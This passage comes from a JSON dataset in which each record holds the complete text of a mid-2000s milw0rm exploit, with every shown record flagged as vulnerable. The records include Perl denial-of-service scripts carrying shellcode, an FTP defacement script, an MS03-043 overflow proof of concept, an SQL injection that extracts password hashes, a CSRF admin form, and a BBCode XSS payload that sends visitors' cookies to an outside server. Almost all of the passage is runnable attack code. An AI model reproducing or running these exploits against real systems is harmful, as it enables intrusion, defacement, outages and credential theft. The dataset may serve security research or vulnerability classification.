}\n\n#endif\n\n\n\n\n\n// milw0rm.com [2005-07-14]",
575        "vulnerable": true
576    },
577    {
578        "exploit_id": 1106,
579        "content": "/*\n\n1) Change milw0rm.com to your domain.com\n\n2) Post the below code into a new message.\n\n\n\nCredits to Nick Griffin.\n\n\n\n/str0ke\n\n*/\n\n\n\n[color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]\n\n\n\n\n\n# milw0rm.com [2005-07-14]",
580        "vulnerable": true
581    },
582    {
583        "exploit_id": 1107,
584        "content": "#!/usr/local/bin/perl\n\n#\n\n#  Remote Control Server DOS Exploit\n\n# ------------------------------------\n\n# Infam0us Gr0up - Securiti Research\n\n# \n\n#\n\n# Tested on Windows2000 SP4 (Win NT)\n\n# Info: infamous.2hell.com\n\n#\n\n\n\n$ARGC=@ARGV;\n\nif ($ARGC !=1) {\n\n    print \"\\n\";\n\n    print \" Remote Control Server DOS Exploit\\n\";\n\n    print \"------------------------------------\\n\\n\";\n\n    print \"Usage: $0 [remote IP]\\n\";\n\n    print \"Exam: $0 127.0.0.1\\n\";\n\n    exit;\n\n}\n\nuse Socket;\n\n\n\nmy($remote,$port,$iaddr,$paddr,$proto);\n\n$remote=$ARGV[0];\n\n$port = \"1071\"; \n\nprint \"\\n\";\n\nprint \"[+] Connect to $remote..\\n\";\n\n\n\n$iaddr = inet_aton($remote) or die \"Error: $!\";\n\n$paddr = sockaddr_in($port, $iaddr) or die \"Error: $!\";\n\n$proto = getprotobyname('tcp') or die \"Error: $!\";\n\n\n\n\n\nsocket(SOCK, PF_INET, SOCK_STREAM, $proto) or die \"Error: $!\";\n\nconnect(SOCK, $paddr) or die \"Error: $!\";\n\n\n\nprint \"[+] Connected\\n\";\n\nprint \"[+] Build server sploit..\\n\";\n\nsleep(3);\n\n$sploit = \"\\xeb\\x03\\x5a\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x8b\\xec\\x8b\\xc2\\x83\\xc0\\x18\\x33\\xc9\";\n\n$sploit=$sploit . \"\\x66\\xb9\\xb3\\x80\\x66\\x81\\xf1\\x80\\x80\\x80\\x30\\x99\\x40\\xe2\\xfa\\xaa\\x59\";\n\n$sploit=$sploit . \"\\xf1\\x19\\x99\\x99\\x99\\xf3\\x9b\\xc9\\xc9\\xf1\\x99\\x99\\x99\\x89\\x1a\\x5b\\xa4\";\n\n$sploit=$sploit . \"\\xcb\\x27\\x51\\x99\\xd5\\x99\\x66\\x8f\\xaa\\x59\\xc9\\x27\\x09\\x98\\xd5\\x99\\x66\";\n\n$sploit=$sploit . \"\\x8f\\xfa\\xa3\\xc5\\xfd\\xfc\\xff\\xfa\\xf6\\xf4\\xb7\\xf0\\xe0\\xfd\\x99\";\n\n\n\nprint \"[+] Attacking server..\\n\";\n\nsleep(2);\n\n$msg = \"reboot\" . $sploit . \"\\x90\" x (3096 - length($sploit)) . \"\\xe8\\xf1\\xc5\\x05\" . \"|LOGOFF|\";\n\nprint $msg;\n\nsend(SOCK, $msg, 0) or die \"Cannot send query: $!\";\n\nprint \"DONE\\n\";\n\nprint \"[+] Server D0s'ed\\n\";\n\nsleep(1);\n\nclose(SOCK);\n\n\n\nmy($remote,$port,$iaddr,$paddr,$proto);\n\n$remote=$ARGV[0];\n\n$port1 = \"1073\"; \n\n\n\nprint \"[+] Connect to Client server..\\n\";\n\n\n\n$iaddr = inet_aton($remote) or die \"Error: $!\";\n\n$paddr = sockaddr_in($port1, $iaddr) or die \"Error: $!\";\n\n$proto = getprotobyname('tcp') or die \"Error: $!\";\n\n\n\nsocket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die \"Error: $!\";\n\nconnect(SOCK1, $paddr) or die \"Error: $!\";\n\n\n\nprint \"[+] Connected\\n\";\n\nprint \"[+] Build client Spl0it..\\n\";\n\nsleep(3);\n\n\n\n$dos =\n\n\"\\xeb\\x6e\\x5e\\x29\\xc0\\x89\\x46\\x10\".\n\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\n\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\n\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\n\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\n\n\"\\x80\\x43\\xc6\\x46\\x10\\x10\\x88\\x46\".\n\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\n\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\n\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\n\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\n\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\n\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\n\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\n\n\"\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\".\n\n\"\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\".\n\n\"\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\".\n\n\"\\xe8\\x8d\\xff\\xff\";\n\n\n\n\n\nprint \"[+] Attacking client..\\n\";\n\nsleep(2);\n\n\n\nprint $dos;\n\nsend(SOCK1, $dos, 0) or die \"Cannot send query: $!\";\n\n\n\nprint \"DONE\\n\";\n\nprint \"[+] Client D0s'ed\\n\";\n\nsleep(1);\n\nclose(SOCK1);\n\nexit;\n\n\n\n# milw0rm.com [2005-07-15]",
585        "vulnerable": true
586    },
587    {
588        "exploit_id": 1108,
589        "content": "#!/usr/bin/perl\n\n#\n\n#  sHTTP FTPServer Abritary Data Execution Exploit\n\n# --------------------------------------------------\n\n#      Infam0us Gr0up - Securiti Research\n\n# \n\n#\n\n# E:\\PERL>perl shttp.pl localhost C:\\shttps\n\n# \n\n# [?] Version: libwww-perl-5.76\n\n# [+] Connect to localhost...\n\n# [+] Connected\n\n# [+] Send user and pass..\n\n# [+] Logged in!\n\n# [+] Directory List:\n\n# \n\n# . | 0\n\n# .. | 0\n\n# uninst.exe | 3072\n\n# http.exe | 78848\n\n# desc.htm | 42788\n\n# license.txt | 1804\n\n# http.cfg | 1616\n\n# www | 0\n\n# 1.txt | 41\n\n# \n\n# [+] Getting FTP config..[OK]\n\n# [+] Backup target file..[OK]\n\n# [+] Set homepage defacement..[DONE]\n\n# [*] 0wned!\n\n# \n\n# Tested on Windows2000 SP4 (Win NT)\n\n# info: infamous.2hell.com\n\n#\n\n\n\nuse LWP;\n\n\n\n$subject = \"sHTTP FTPServer Abritary Data Execution Exploit\";\n\n$vers = \"Small HTTP server  3.05.28\";\n\n$vendor = \"http://srv.mf.inc.ru\";\n\n$codz = \"basher13 - basher13(at)linuxmail.org\";\n\n\n\nif(@ARGV!=2){\n\n    print \"\\n\";\n\n    print \" $subject\\n\";\n\n    print \"-------------------------------------------------\\n\\n\";\n\n    print \"Usage: $0 [remote IP] [dir_path] \\n\";\n\n    print \"Exam: $0 127.0.0.1 c:\\\\shttps \\n\\n\";\n\n    exit;\n\n}\n\n\n\nuse Net::FTP;\n\nuse IO::Dir;  \n\nuse Tk;\n\n\n\n$target = $ARGV[0];\n\n$path = $ARGV[1];\n\n\n\n\n\n# Modify $text to changes the default homepage\n\n$text = \"[title]PENETRATION TEST[/title]Subject: $subject[br]Version: $vers[br]URL: $vendor[br]Coders: $codz\";\n\n\n\nmy $user = \"admin\"; # Changes USER to own feed\n\nmy $pass = \"ftp\"; # Changes PASS to own feed\n\n\n\n$cols=1000000;\n\n\n\nprint \"\\n\";\n\nprint \"-------------------------------------------------------\\n\";\n\nprint \"[?] Version: libwww-perl-$LWP::VERSION\\n\";\n\nsleep(2);\n\nprint \"[+] Connect to $target...\\n\"; \n\n$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die \"could not \n\nconnect: $!\";\n\n\n\nprint \"[+] Connected\\n\";\n\nprint \"[+] Send user and pass..\\n\";\n\n$ftp->login($user, $pass) || die \"could not login: $!\"; \n\nsleep(1);\n\n\n\nprint \"[+] Logged in!\\n\";\n\nprint \"[+] Directory List: \\n\\n\";\n\nsleep(2);\n\n\n\ntie %dir, IO::Dir, $path;\n\nforeach (keys %dir) {\n\nprint  $_, \" | \" , $dir{$_}->size,\"\\n\";\n\n}\n\n\n\nprint \"\\n\";\n\nprint \"[+] Getting FTP config..\";\n\nsleep(1);\n\n\n\n$ftp->get(\"http.cfg\")\n\n      or die \"Get failed \", $ftp->message;  \n\n\n\nprint \"[OK]\\n\";\n\nprint \"[+] Backup target file..\";\n\nsleep(2);\n\n\n\n$dirpath = \"$path\\\\www\\\\index.htm\";\n\n\n\n$lama = $dirpath;\n\n$baru = \"$dirpath.BAK.$$(basher13)\";\n\n\n\n open(OLD, \"< $lama\")         or die \"FAILED to open $lama\\n[-] Reason: Try on another place..\\n\";\n\n open(NEW, \"> $baru\")         or die \"can't open $baru: $!\\n\";\n\n\n\n while () {\n\n        s/\\b(p)earl\\b/${1}erl/i;\n\n        (print NEW $_)       or die \"FAILED to write to $baru\\n[-] Reason: Server has secure permission\\n\";\n\n    }\n\n close(OLD)                  or die \"FAILED to close $lama\\n\";\n\n close(NEW)                  or die \"can't close $baru\\n\";\n\n\n\nprint \"[OK]\\n\";\n\nprint \"[+] Set homepage defacement..\";\n\nsleep(2);\n\n\n\nopen(OUT, \">$dirpath\") or die(\"unable to open $dirpath: $!\");\n\nopen FH, \">$dirpath\";\n\nprint FH \"$text\";\n\nprint \"[DONE]\\n\";\n\nclose FH;\n\n    \n\nprint \"[*] 0wned!\\n\";\n\n$ftp->quit;  \n\nprint \"-------------------------------------------------------\\n\";\n\nmy $mw = MainWindow->new(-title => 'INFO',);\n\n    my $var;\n\n\n\n    my $opt = $mw->Optionmenu(\n\n                \n\n                -options => [qw()],\n\n                -command => sub { print \"\\n[>]: \", shift, \"\\n\" },\n\n                -variable => \\$var,\n\n                )->pack;\n\n    $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   \n\n    $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;\n\n    MainLoop;\n\n\n\n# milw0rm.com [2005-07-15]",
590        "vulnerable": true
591    },
592    {
593        "exploit_id": 1109,
594        "content": "#!/usr/bin/perl\n\n#\n\n#    DzSoft PHP Server DOS Exploit\n\n# ------------------------------------\n\n#  Infam0us Gr0up - Securiti Research\n\n# \n\n#\n\n# Tested on Windows2000 SP4 (Win NT)\n\n# Info: infamous.2hell.com\n\n#\n\n\n\n$subject = \"DzSoft PHP Server DOS Exploit\";\n\n$vers = \"DzSoft PHP Editor  3.1.2.8\";\n\n$vendor = \"http://www.dzsoft.com\";\n\n$codz = \"basher13 - basher13(at)linuxmail.org\";\n\n\n\n$ARGC=@ARGV;\n\nif ($ARGC !=2) {\n\n    print \"\\n\";\n\n    print \"   $subject\\n\";\n\n    print \"------------------------------------\\n\\n\";\n\n    print \"Usage: $0 [remote IP] [port]\\n\";\n\n    print \"Exam: $0 127.0.0.1 80\\n\";\n\n    exit;\n\n}\n\n\n\nuse IO::Socket::INET;\n\nuse Tk;\n\n\n\n$host=$ARGV[0];\n\n$port=$ARGV[1];\n\n\n\nprint \"\\n\";\n\nprint \"-------------------------------------------------------\\n\";\n\nprint \"[?] Version: libwww-perl-$LWP::VERSION\\n\";\n\nprint \"[+] Connect to $host..\\n\";\n\n$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') \n\n|| die \"[-] Connection error$@\\n\";\n\n\n\nprint \"[+] Connected\\n\";\n\nprint \"[+] Bindmode for socket..\\n\";\n\nsleep(1);\n\nbinmode($sock);\n\n\n\nprint \"[+] Build buffer..\\n\";\n\n$hostname=\"Host: $host\";\n\n$bufy='A'x50;\n\n$bufa='A'x8183;\n\n$len=length($bufy);\n\n$buff=\"GET / HTTP/1.1\\r\\n\";\n\nsleep(1);\n\n\n\nprint \"[+] Now kill the process..wait\\n\";\n\nsend($sock,$buff,0) || die \"[-] send error:$@\\n\";\n\nprint \"[+] Sending buffer..\\n\";\n\nfor($i= 0; $i < 2000000; $i++)\n\n{\n\n    $buff=\" $bufa\\r\\n\";\n\n    send($sock,$buff,0) || die \"[*] send error:$@, Check if server D0s'ed\\n\";\n\n}\n\n$buff=\"$hostname\\r\\n\";\n\n$buff.=\"Content-Length: $len\\r\\n\";\n\n\n\n$buff.=\"\\r\\n\";\n\n$buff.=$bufy.\"\\r\\n\\r\\n\";\n\n\n\nsend($sock,$buff,0) || die \"[-] send error:$@\\n\";\n\nprint \"[+] Server Out of Memory\\n\";\n\nclose($sock);\n\nprint \"-------------------------------------------------------\\n\";\n\nmy $mw = MainWindow->new(-title => 'INFO',);\n\n    my $var;\n\n\n\n    my $opt = $mw->Optionmenu(\n\n                \n\n                -options => [qw()],\n\n                -command => sub { print \"\\n[>]: \", shift, \"\\n\" },\n\n                -variable => \\$var,\n\n                )->pack;\n\n    $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   \n\n    $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;\n\n    MainLoop;\n\n\n\n# milw0rm.com [2005-07-15]",
595        "vulnerable": true
596    },
597    {
598        "exploit_id": 111,
599        "content": "/*\n\n\n\nDoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.\n\nLaunching it one or two times against the target should make the \n\nmachine reboot. Tested against a Win2K SP4.\n\n\n\n\"The vulnerability results because the Messenger Service does not \n\nproperly validate the length of a message before passing it to the allocated \n\nbuffer\" according to MS bulletin. Digging into it a bit more, we find that when \n\na character 0x14 in encountered in the 'body' part of the message, it is \n\nreplaced by a CR+LF. The buffer allocated for this operation is twice the size \n\nof the string, which is the way to go, but is then copied to a buffer which \n\nwas only allocated 11CAh bytes. Thanks to that, we can bypass the length checks \n\nand overflow the fixed size buffer.\n\n\n\nCredits go to LSD :)\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <winsock.h>\n\n#include <string.h>\n\n#include <time.h>\n\n\n\n// Packet format found thanks to a bit a sniffing\n\nstatic unsigned char packet_header[] =\n\n\"\\x04\\x00\\x28\\x00\"\n\n\"\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\xf8\\x91\\x7b\\x5a\\x00\\xff\\xd0\\x11\\xa9\\xb2\\x00\\xc0\"\n\n\"\\x4f\\xb6\\xe6\\xfc\"\n\n\"\\xff\\xff\\xff\\xff\" // @40 : unique id over 16 bytes ?\n\n\"\\xff\\xff\\xff\\xff\"\n\n\"\\xff\\xff\\xff\\xff\"\n\n\"\\xff\\xff\\xff\\xff\"\n\n\"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\xff\\xff\\xff\\xff\"\n\n\"\\xff\\xff\\xff\\xff\" // @74 : fields length\n\n\"\\x00\\x00\";\n\n\n\n// Exploit downloaded on www.k-otik.com\n\nunsigned char field_header[] =\n\n\"\\xff\\xff\\xff\\xff\" // @0 : field length\n\n\"\\x00\\x00\\x00\\x00\"\n\n\"\\xff\\xff\\xff\\xff\"; // @8 : field length\n\n\n\nint main(int argc,char *argv[])\n\n{\n\n\tint i, packet_size, fields_size, s;\n\n\tunsigned char packet[8192];\n\n\tstruct sockaddr_in addr;\n\n\t// A few conditions :\n\n\t// 0 <= strlen(from) + strlen(machine) <= 56\n\n\t// max fields size 3992\n\n\tchar from[] = \"RECCA\";\n\n\tchar machine[] = \"ZEUS\";\n\n\tchar body[4096] = \"*** MESSAGE ***\";\n\n\n\n\tWSADATA wsaData;\n\n\n\n\tWSAStartup(0x0202, &wsaData);\n\n\n\n\tZeroMemory(&addr, sizeof(addr));\n\n\taddr.sin_family = AF_INET;\n\n\taddr.sin_addr.s_addr = inet_addr(\"192.168.186.3\");\n\n\taddr.sin_port = htons(135);\n\n\n\n\tZeroMemory(packet, sizeof(packet));\n\n\tpacket_size = 0;\n\n\n\n\tmemcpy(&packet[packet_size], packet_header, sizeof(packet_header) - \n\n1);\n\n\tpacket_size += sizeof(packet_header) - 1;\n\n\n\n\ti = strlen(from) + 1;\n\n\t*(unsigned int *)(&field_header[0]) = i;\n\n\t*(unsigned int *)(&field_header[8]) = i;\n\n\tmemcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);\n\n\tpacket_size += sizeof(field_header) - 1;\n\n\tstrcpy(&packet[packet_size], from);\n\n\tpacket_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4\n\n\n\n\ti = strlen(machine) + 1;\n\n\t*(unsigned int *)(&field_header[0]) = i;\n\n\t*(unsigned int *)(&field_header[8]) = i;\n\n\tmemcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);\n\n\tpacket_size += sizeof(field_header) - 1;\n\n\tstrcpy(&packet[packet_size], machine);\n\n\tpacket_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4\n\n\n\n\tfprintf(stdout, \"Max 'body' size (incl. terminal NULL char) = %d\\n\", \n\n3992 - packet_size + sizeof(packet_header) - sizeof(field_header));\n\n\tmemset(body, 0x14, sizeof(body));\n\n\tbody[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) \n\n- 1] = '\\0';\n\n\n\n\ti = strlen(body) + 1;\n\n\t*(unsigned int *)(&field_header[0]) = i;\n\n\t*(unsigned int *)(&field_header[8]) = i;\n\n\tmemcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);\n\n\tpacket_size += sizeof(field_header) - 1;\n\n\tstrcpy(&packet[packet_size], body);\n\n\tpacket_size += i;\n\n\n\n\tfields_size = packet_size - (sizeof(packet_header) - 1);\n\n\t*(unsigned int *)(&packet[40]) = time(NULL);\n\n\t*(unsigned int *)(&packet[74]) = fields_size;\n\n\n\n\tfprintf(stdout, \"Total length of strings = %d\\nPacket size = \n\n%d\\nFields size = %d\\n\", strlen(from) + strlen(machine) + strlen(body), \n\npacket_size, fields_size);\n\n\n\n/*\n\n\tfor (i = 0; i < packet_size; i++)\n\n\t{\n\n\t\tif (i && ((i & 1) == 0))\n\n\t\t\tfprintf(stdout, \" \");\n\n\t\tif (i && ((i & 15) == 0))\n\n\t\t\tfprintf(stdout, \"\\n\");\n\n\t\tfprintf(stdout, \"%02x\", packet[i]);\n\n\t}\n\n\tfprintf(stdout, \"\\n\");\n\n*/\n\n\tif ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)\n\n\t\texit(EXIT_FAILURE);\n\n\n\n\tif (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, \n\nsizeof(addr)) == -1)\n\n\t\texit(EXIT_FAILURE);\n\n/*\n\n\tif (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)\n\n\t\texit(EXIT_FAILURE);\n\n*/\n\n\n\n\texit(EXIT_SUCCESS);\n\n}\n\n\n\n// milw0rm.com [2003-10-18]",
600        "vulnerable": true
601    },
602    {
603        "exploit_id": 1110,
604        "content": "*/-----------------------------edwardgagnon--------------/*\n\n\n\nCan crash msn and execute commands\n\n\n\nWindows has a buffer overflow vulnerability in the processing of embedded ICC Profiles \n\ninside images (jpeg, tiff, etc...)\n\n\n\nTo test - create a jpeg in adobe photoshop and save it with the ICC checkbox enabled, \n\nmake sure you set it to RGB (that does not really matter, just so you can find which \n\nbytes to change for the test).\n\n\n\nOpen in a hex editor and search for \"RGB XYZ \" (no quotes, case sensitive)\n\n\n\nYou are now inside the header of the ICC Profile which is 128 bytes.\n\n104 bytes away is a 4 byte number which is the Tag Count of the ICC Profile.\n\nChange this to \"FF FF FF FF\" (it will be followed by a 4 byte string which is \n\npart of a 12 byte tag. there are several such tags, it should help you identify \n\nwhich bytes to change).\n\n\n\nSave, open in internet explorer, and see the crash.\n\n\n\nand this is the crash:\n\n\n\nCODE\n\n.text:73B323BC loc_73B323BC:                          ; CODE XREF: GetColorProfileElement+D6\u0019j\n\n.text:73B323BC                 cmp     [ebx], eax\n\n.text:73B323BE                 jz      short loc_73B323DD\n\n.text:73B323C0                 add     ebx, 0Ch\n\n.text:73B323C3                 inc     edx\n\n.text:73B323C4                 cmp     edx, ecx\n\n.text:73B323C6                 jb      short loc_73B323BC\n\n.text:73B323C8\n\n.text:73B323C8 loc_73B323C8:                          ; CODE XREF: GetColorProfileElement+CA\u0018j\n\n.text:73B323C8                 push    7DCh           ; dwErrCode\n\n.text:73B323CD                 call    ds:SetLastError\n\n\n\n\n\nebx is controlable. but gets a read access violation.\n\n\n\n....be kool and create a PoC and change your sig to the exploit.jpg\n\n\n\n# milw0rm.com [2005-07-15]",
605        "vulnerable": true
606    },
607    {
608        "exploit_id": 1111,
609        "content": "#!/usr/bin/perl -w \n\n  \n\n # OpenBB sql injection \n\n # tested on Open Bulletin Board 1.0.5 with mysql \n\n # (c)oded by x97Rang 2005 RST/GHC \n\n # Gr33tz:  __blf, 1dt.w0lf \n\n  \n\n use IO::Socket; \n\n  \n\n if (@ARGV != 3) \n\n { \n\n    print \"\\nUsage: $0 [server] [path] [id]\\n\"; \n\n    print \"like $0 forum.mysite.com / 1\\n\"; \n\n    print \"If found nothing - forum NOT vulnerable\\n\\n\"; \n\n    exit (); \n\n } \n\n  \n\n $server = $ARGV[0]; \n\n $path = $ARGV[1]; \n\n $id = $ARGV[2]; \n\n  \n\n $socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\",  PeerPort => \"80\"); \n\n printf $socket (\"GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0\\nHost: %s\\nAccept: */*\\nConnection: close\\n\\n\", \n\n  $path,$server,$id); \n\n  \n\n while(<$socket>) \n\n { \n\n     if (/\\>(\\w{32})\\</) { print \"$1\\n\"; } \n\n }\n\n\n\n# milw0rm.com [2005-07-18]",
610        "vulnerable": true
611    },
612    {
613        "exploit_id": 1112,
614        "content": "<!-- Change [url] /str0ke -->\n\n\n\n<form method=\"post\" name=\"addform\" action=\"http://[url]/admin/iis/IISActions.asp?ActionType=AddSite&hostcustid=1&hostingplans=1\">\n\n<table>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"Contents\">Website Name : </td>\n\n<td width=\"73%\" class=\"contents\">\n\n<input type=\"text\" size=\"25\" name=\"fServerComment\">\n\n</td></tr><td>\n\nThirdLevelDomainCheck: </td><td><input type=\"TEXT\" name=\"ThirdLevelDomainCheck\" value=\"FALSE\"></td>\n\n</tr>WebUsers: <input type=\"TEXT\" name=\"WebUsers\" ID=\"WebUsers\" value=\"YourUsername\"><br>\n\nhostcustid: <input type=\"TEXT\" name=\"hostcustid\" ID=\"hostcustid\" value=\"1\"><tr>\n\n<td height=\"0\" colspan=\"2\">\n\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n\n<tr class=\"LoopListingdark\">\n\n<td width=\"19%\" class=\"contents\"> Website Type : </td>\n\n<td width=\"73%\" class=\"contents\"><select name=\"IPLessCheckBox\" id=\"IPLessCheckBox\"><option value=\"NO\">IP Based Domain</option><option value=\"YES\">\n\n       Name Based Domain\n\n      </option></select></td>\n\n</tr>\n\n</table>\n\n<div id=\"DivIPBased\" style=\"font:10px bold;Visibility:Visible\">\n\n<table width=\"100%\" ID=\"Table1\" cellspacing=\"1\" cellpadding=\"0\" border=\"0\" height=\"100%\">IPAddress : <input type=\"TEXT\" name=\"fIPAddress\" value=\"127.0.0.1\" ID=\"TEXT1\">PortNo :<input type=\"TEXT\" size=\"30\" name=\"fPortNo\" value=\"80\" ID=\"TEXT2\">IPLessDomain: <input type=\"TEXT\" name=\"fIPLessDomain\" value=\"FALSE\" ID=\"TEXT3\"></table></div>\n\n</td>\n\n</tr>\n\n<tr>\n\n<td colspan=\"2\" align=\"left\">\n\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> Mail Access : </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"checkbox\" name=\"mailaccess\" value=\"YES\" ID=\"mailaccess\" checked> Enable\n\n   </td>\n\n</tr>\n\n</table>\n\n<div id=\"DivMailAccess\" style=\"font:10px bold;Visibility:Visible\">\n\n<table class=\"bg2\" width=\"100%\" border=\"0\" cellspacing=\"1\">\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\">  Mail Server : </td>\n\n<td width=\"73%\" class=\"contents\"><select id=\"Select3\" name=\"MailServerType\"><option>IMail Server</option>\n\n<option>Merak Mail Server</option>\n\n<option>MailEnable Server</option></select></td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> Mail Password : </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"password\" id=\"mailpassword\" name=\"mailpassword\"></td>\n\n</tr>\n\n</table>\n\n</div>\n\n</td>\n\n</tr><tr><td>SiteType: </td><td><input type=\"TEXT\" name=\"SiteType\" value=\"www\" ID=\"TEXT4\"><tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\" colspan=\"2\"> </td>\n\n</tr>\n\n<tr>\n\n<td colspan=\"2\" align=\"left\">\n\n<div id=\"DivAdvSettings\" style=\"font:10px bold;Visibility:Visible\">\n\n<table width=\"100%\" border=\"0\" ID=\"Table3\" cellspacing=\"1\" cellpadding=\"1\">\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> Allow Anonymous : </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"radio\" name=\"AllowAnon\" value=\"NO\" ID=\"Radio1\">No\n\n        <input type=\"radio\" name=\"AllowAnon\" value=\"YES\" ID=\"Radio2\" checked>Yes\n\n       </td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> Access Permissions : </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"checkbox\" name=\"Read\" value=\"YES\" ID=\"Checkbox1\" checked>Read\n\n        <input type=\"checkbox\" name=\"Write\" value=\"YES\" ID=\"Checkbox2\">Write\n\n        <input type=\"checkbox\" name=\"Script\" value=\"YES\" ID=\"Checkbox3\" checked>Script\n\n       </td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"checkbox\" name=\"Execute\" value=\"YES\" ID=\"Checkbox4\">Execute (Includes Script)\n\n       </td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"checkbox\" name=\"DirBrowsing\" value=\"YES\" ID=\"Checkbox5\">Directory Browsing Allowed\n\n       </td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"checkbox\" name=\"FrontPageWeb\" value=\"YES\" ID=\"Checkbox6\"> Install FrontPage Extensions\n\n       </td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\">Enable Default Document : </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"Checkbox\" name=\"enabledefaultdoc\" value=\"YES\" ID=\"Checkbox7\" checked></td>\n\n</tr>\n\n<tr class=\"looplistingDark\">\n\n<td width=\"19%\" class=\"contents\"> </td>\n\n<td width=\"73%\" class=\"contents\"><input type=\"Text\" name=\"defaultdoc\" value=\"Default.htm,default.asp,index.htm,index.html,index.cfm,index.asp,default.aspx,index.aspx\" size=\"60\" ID=\"Text1\"></td>\n\n</tr>\n\n</table>\n\n</div>\n\n</td>\n\n</tr>\n\n<tr class=\"btnbg\">\n\n<td width=\"73%\" align=\"right\" class=\"btnbg\" colspan=\"2\">\n\n<table cellpadding=\"0\" cellspacing=\"0\" border=\"0\">\n\n<tr>\n\n<td><input type=\"submit\" class=\"butn\" name=\"Add Site2\" value=\"  Next  >>  \"> </td>\n\n</tr>\n\n</table>\n\n</td>\n\n</tr>\n\n</table>\n\n</form>\n\n\n\n# milw0rm.com [2005-07-18]",
615        "vulnerable": true
616    },
617    {
618        "exploit_id": 1113,
